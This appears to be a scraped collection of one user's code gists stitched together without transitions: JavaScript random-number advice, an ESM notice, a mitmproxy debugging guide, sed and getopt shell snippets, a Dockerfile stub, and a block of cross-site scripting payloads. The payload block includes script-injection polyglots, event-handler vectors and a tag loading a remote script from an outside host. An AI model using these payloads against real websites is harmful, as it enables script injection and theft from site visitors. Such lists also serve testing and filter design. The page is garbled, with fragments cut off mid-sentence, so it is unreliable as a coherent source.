Micael Levi L. Cavalcante micalevisk

Not all random values are created equal - for security-related code, you need a specific kind of random value.

A summary of this article, if you don't want to read the entire thing:

Don't use Math.random(). There are extremely few cases where Math.random() is the right answer. Don't use it, unless you've read this entire article, and determined that it's necessary for your case.
Don't use crypto.getRandomBytes directly. While it's a CSPRNG, it's easy to bias the result when 'transforming' it, such that the output becomes more predictable.
If you want to generate random tokens or API keys: Use uuid, specifically the uuid.v4() method. Avoid node-uuid - it's not the same package, and doesn't produce reliably secure random values.
If you want to generate random numbers in a range: Use random-number-csprng.

You should seriously consider reading the entire article, though - it's

JavaScript Bitwise Hacks

It assumes the highest positive signed 32-bit float value for numbers. In other words, 2147483647 (or 0x7FFFFFFF or 2^31-1).

Pure ESM package

The package that linked you here is now pure ESM. It cannot be require()'d from CommonJS.

This means you have the following choices:

Use ESM yourself. (preferred)
Use import foo from 'foo' instead of const foo = require('foo') to import the package. You also need to put "type": "module" in your package.json and more. Follow the below guide.
If the package is used in an async context, you could use await import(…) from CommonJS instead of require(…).
Stay on the existing version of the package until you can move to ESM.

`mitmproxy`

How-to man-in-the-middle your own application's traffic for debugging. Below is a quick step-by-step guide to putting mitmproxy between your hard-to-debug application's HTTP(s) network traffic and its destinations. Allowing you to spy on all requests, as well as modify and replay them. Theres a nice blog post with more screenshots and some explanation behind mitm-ing available here: https://earthly.dev/blog/mitmproxy/

1. Install dependencies

global-agent - Global node proxy configuration via environment variables (npm) Optional - only necessary for proxying local node scripts/apps that don't have an explicit proxy option. a. $ npm i -g global-agent
mitmproxy - Popular opensource python man-in-the-middle proxy with web interface (homepage)

	##FILE SPACING:

	# double space a file
	sed G

	# double space a file which already has blank lines in it. Output file
	# should contain no more than one blank line between lines of text.
	sed '/^$/d;G'

	# triple space a file

	#!/bin/bash
	#
	# Example of how to parse short/long options with 'getopt'
	#

	OPTS=`getopt -o vhns: --long verbose,dry-run,help,stack-size: -n 'parse-options' -- "$@"`

	if [ $? != 0 ] ; then echo "Failed parsing options." >&2 ; exit 1 ; fi

	echo "$OPTS"

	';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
	'';!--"<XSS>=&{()}
	0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
	<script/src=data:,alert()>
	<marquee/onstart=alert()>
	<video/poster/onerror=alert()>
	<isindex/autofocus/onfocus=alert()>
	<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
	<IMG SRC="javascript:alert('XSS');">
	<IMG SRC=javascript:alert('XSS')>

	FROM alpine:latest

	LABEL MAINTAINER="Faizan Bashir <[email protected]>"

	# Linking of locale.h as xlocale.h
	# This is done to ensure successfull install of python numpy package
	# see https://forum.alpinelinux.org/comment/690#comment-690 for more information.

	WORKDIR /var/www/

Micael Levi L. Cavalcante micalevisk

JavaScript Bitwise Hacks

Table of Contents

Pure ESM package

mitmproxy

1. Install dependencies

`mitmproxy`